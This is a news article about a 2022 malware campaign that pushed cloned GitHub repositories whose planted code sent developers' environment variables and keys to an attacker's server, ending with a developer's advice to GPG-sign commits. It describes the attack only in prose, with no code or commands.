The developer who discovered the vulnerability asked other developers to sign their revisions using the GPG key so that the project’s revision history could be checked.
On a day when thousands of wallets with Solana addresses had millions of dollars’ worth of funds stolen, the important developer platform GitHub came under a pervasive malware attack and reported 35,000 “code hits.”
Stephen Lucy, a GitHub developer who first reported the incident earlier on Wednesday, highlighted the attack’s broad reach. The problem was discovered by the developer as he was looking over a project that he had located via Google.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9— Stephen Lacy (@stephenlacy) August 3, 2022
The attack has so far been discovered to affect a number of projects, including crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes. The NPM script, a convenient way to group common shell commands for a project, the install documentation, and the docker images are the targets of the malware attack.
The attacker first makes a fake repository (a repository contains all of the project’s files and each file’s revision history) and pushes clones of legitimate projects to GitHub in order to trick developers and gain access to crucial data. The following two screenshots, for instance, display this legitimate crypto miner project and its clone.
These “pull requests,” which permit developers to inform others about changes they have pushed to a branch in a repository on GitHub, were used to push many of these clone repositories.
The entire environment variable (ENV) of the script, application, or laptop (Electron apps) is sent to the attacker’s server as soon as the developer succumbs to the malware attack. The ENV contains a variety of keys, such as access keys for Amazon Web Services, crypto keys, and security keys.
The problem has been reported to GitHub by the developer, who also gave developers the advice to GPG-sign any revisions they make to the repository. GPG keys provide a way to confirm that all revisions come from a reputable source, adding an extra layer of security to GitHub accounts and software projects.
